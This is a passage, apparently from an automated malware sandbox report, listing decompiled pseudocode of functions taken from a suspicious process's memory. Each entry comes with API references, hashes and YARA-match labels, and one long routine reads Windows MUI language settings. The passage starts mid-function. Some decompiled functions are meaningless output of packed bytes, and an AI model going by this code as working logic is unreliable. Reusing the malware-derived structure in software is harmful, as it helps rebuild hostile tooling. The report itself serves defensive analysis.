                                                                                                                                                                                                          					return  *((intOrPtr*)( *__esi))();
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					0x2e296bd8();
                                                                                                                                                                                                          					_t4 =  &_v117;
                                                                                                                                                                                                          					 *_t4 = _v117 - __dl;
                                                                                                                                                                                                          					__eflags =  *_t4;
                                                                                                                                                                                                          					__ebp = __esp;
                                                                                                                                                                                                          					__eax = _a4;
                                                                                                                                                                                                          					__esi = _a4 + 0xc8c;
                                                                                                                                                                                                          					__eax = E00418DC0(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
                                                                                                                                                                                                          					__edx = _a16;
                                                                                                                                                                                                          					__eax = _a12;
                                                                                                                                                                                                          					__edx =  *__esi;
                                                                                                                                                                                                          					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                                                                          					__esi = __esi;
                                                                                                                                                                                                          					__ebp = __ebp;
                                                                                                                                                                                                          					return __eax;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          • Opcode ID: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                                                                                                                                          • Instruction ID: 65204f1e0b89d90fab1e4f0e6e35f8594f9b64f63a7785db3f21326e2eb3355a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F0CDB22002086FDB24DFA5DC80EEB77ACEF88310F14864EF94D97201C934E9008BB4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                                                                          				char _t10;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                                                                          				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                                          				return _t10;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          0x004184df
                                                                                                                                                                                                          0x004184e7
                                                                                                                                                                                                          0x004184fd
                                                                                                                                                                                                          0x00418501

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                          • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                                                                          				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                                          				return _t10;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          0x004184a7
                                                                                                                                                                                                          0x004184bd
                                                                                                                                                                                                          0x004184c1

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                          • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                                                                          				int _t10;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                                                                          				return _t10;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          0x0041864a
                                                                                                                                                                                                          0x00418660
                                                                                                                                                                                                          0x00418664

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                          • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00418510(intOrPtr _a4, int _a8) {
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 = _a4;
                                                                                                                                                                                                          				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                                                                          				ExitProcess(_a8);
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          0x00418513
                                                                                                                                                                                                          0x0041852a
                                                                                                                                                                                                          0x00418538

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                          • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E00415675(void* __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi) {
                                                                                                                                                                                                          				intOrPtr* _t11;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                          				_t11 = __eax - 0x765e42bb;
                                                                                                                                                                                                          				asm("in eax, dx");
                                                                                                                                                                                                          				asm("frstor [eax]");
                                                                                                                                                                                                          				asm("cmpsb");
                                                                                                                                                                                                          				 *_t11 =  *_t11 - __ebx;
                                                                                                                                                                                                          				if (__ebx %  *(_t11 + 0x40) > 0) goto 0x15cc545c;
                                                                                                                                                                                                          				return __ebx /  *(_t11 + 0x40);
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                                                                                                                                          • Instruction ID: 784aaf75d6847e34398e7fdcc4e9fc29d16bea1a21f216775e5c3aa0b4e7d5c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4D0A7329954344A8B204D38158A071BBE1F5A3015F0416E2CC889F809D103CC304289
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E004162BB(void* __eax, void* __ecx) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				asm("rcl al, cl");
                                                                                                                                                                                                          				return  *0xa893f006;
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x004162c5
                                                                                                                                                                                                          0x004162d9

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                                                                                                                                          • Instruction ID: 9b49e9f2612febdfa1d12948025200cfe642975c734e1ab1fe035e9a54a9dba0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65C08C2BB4A14D4642204D4DB8020F1F7B9E687076B6432DEEE08A7501C812E01A0669
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00406A95(void* __ecx, char __edx) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				 *((char*)(__ecx - 0x6b33cc02)) = __edx;
                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x00406a9f
                                                                                                                                                                                                          0x00406ab4

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                                                                                                                                          • Instruction ID: 50bc09a2f097cf002c8ac8189eea195ba4731081e88d5350736586a12d43565a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49C08C33A2A1D949C111082D78422BCFB38D753124E1422CBEC88A7300C083C8068649
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E00415843(void* __eax) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				asm("ror edi, 1");
                                                                                                                                                                                                          				return __eax - 0x31;
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x00415843
                                                                                                                                                                                                          0x0041584f

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                                                                                                                                          • Instruction ID: 7095dbb79f45dd1ec694e3b8dbe0fbbaec5a427556b30f4bf89a83f16fc47c12
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FA00237F86B180C6C541CBA7C584F8D735E6C307AC553B77D60CB34404052D017015D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E008F8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				short* _v12;
                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                          				signed int _v52;
                                                                                                                                                                                                          				signed int _v56;
                                                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                          				void* _t216;
                                                                                                                                                                                                          				intOrPtr _t231;
                                                                                                                                                                                                          				short* _t235;
                                                                                                                                                                                                          				intOrPtr _t257;
                                                                                                                                                                                                          				short* _t261;
                                                                                                                                                                                                          				intOrPtr _t284;
                                                                                                                                                                                                          				intOrPtr _t288;
                                                                                                                                                                                                          				void* _t314;
                                                                                                                                                                                                          				signed int _t318;
                                                                                                                                                                                                          				short* _t319;
                                                                                                                                                                                                          				intOrPtr _t321;
                                                                                                                                                                                                          				void* _t328;
                                                                                                                                                                                                          				void* _t329;
                                                                                                                                                                                                          				char* _t332;
                                                                                                                                                                                                          				signed int _t333;
                                                                                                                                                                                                          				signed int* _t334;
                                                                                                                                                                                                          				void* _t335;
                                                                                                                                                                                                          				void* _t338;
                                                                                                                                                                                                          				void* _t339;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t328 = __edx;
                                                                                                                                                                                                          				_t322 = __ecx;
                                                                                                                                                                                                          				_t318 = 0;
                                                                                                                                                                                                          				_t334 = _a4;
                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                          				_v48 = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                          				_v52 = 0;
                                                                                                                                                                                                          				if(_t334 == 0) {
                                                                                                                                                                                                          					_t329 = 0xc000000d;
                                                                                                                                                                                                          					L49:
                                                                                                                                                                                                          					_t334[0x11] = _v56;
                                                                                                                                                                                                          					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                                                                          					_t334[0x12] = _v60;
                                                                                                                                                                                                          					_t334[0x13] = _v28;
                                                                                                                                                                                                          					_t334[0x17] = _v20;
                                                                                                                                                                                                          					_t334[0x16] = _v48;
                                                                                                                                                                                                          					_t334[0x18] = _v40;
                                                                                                                                                                                                          					_t334[0x14] = _v32;
                                                                                                                                                                                                          					_t334[0x15] = _v52;
                                                                                                                                                                                                          					return _t329;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_v56 = 0;
                                                                                                                                                                                                          				if(E008F8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                          					_v56 = 1;
                                                                                                                                                                                                          					if(_v8 != 0) {
                                                                                                                                                                                                          						_t207 = E008DE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                          					_v8 = _t318;
                                                                                                                                                                                                          					E008F718A(_t207);
                                                                                                                                                                                                          					_t335 = _t335 + 4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                                                          				if(E008F8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                          					_t333 =  *_v8;
                                                                                                                                                                                                          					_v60 = _t333;
                                                                                                                                                                                                          					_t314 = E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                          					_push(_t333);
                                                                                                                                                                                                          					_v8 = _t318;
                                                                                                                                                                                                          					E008F718A(_t314);
                                                                                                                                                                                                          					_t335 = _t335 + 4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t216 = E008F8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                                                                          				_t332 = ";";
                                                                                                                                                                                                          				if(_t216 < 0) {
                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                          					if(E008F8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                          						L30:
                                                                                                                                                                                                          						if(E008F8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                          							L46:
                                                                                                                                                                                                          							_t329 = 0;
                                                                                                                                                                                                          							L47:
                                                                                                                                                                                                          							if(_v8 != _t318) {
                                                                                                                                                                                                          								E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_v28 != _t318) {
                                                                                                                                                                                                          								if(_v20 != _t318) {
                                                                                                                                                                                                          									E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                                          									_v20 = _t318;
                                                                                                                                                                                                          									_v40 = _t318;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L49;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t231 = _v24;
                                                                                                                                                                                                          						_t322 = _t231 + 4;
                                                                                                                                                                                                          						_push(_t231);
                                                                                                                                                                                                          						_v52 = _t322;
						E008F718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008D2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008EE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008DE2A8(_t322,  &_v68, _v16);
								if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008EE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008DE2A8(_t322,  &_v68, _t236);
								if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E008F718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008D2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008EE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008DE2A8(_v12,  &_v68, _v16);
							if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008EE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008DE2A8(_t322,  &_v68, _t269);
							if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E008F718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008D2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008EE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008DE2A8(_v12,  &_v68, _v16);
						if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008EE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008DE2A8(_t322,  &_v68, _t296);
						if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                                                                          0x00941b8f
                                                                                                                                                                                                          0x00941b91
                                                                                                                                                                                                          0x00941b91
                                                                                                                                                                                                          0x00941b99
                                                                                                                                                                                                          0x00941b9c
                                                                                                                                                                                                          0x00941ba2
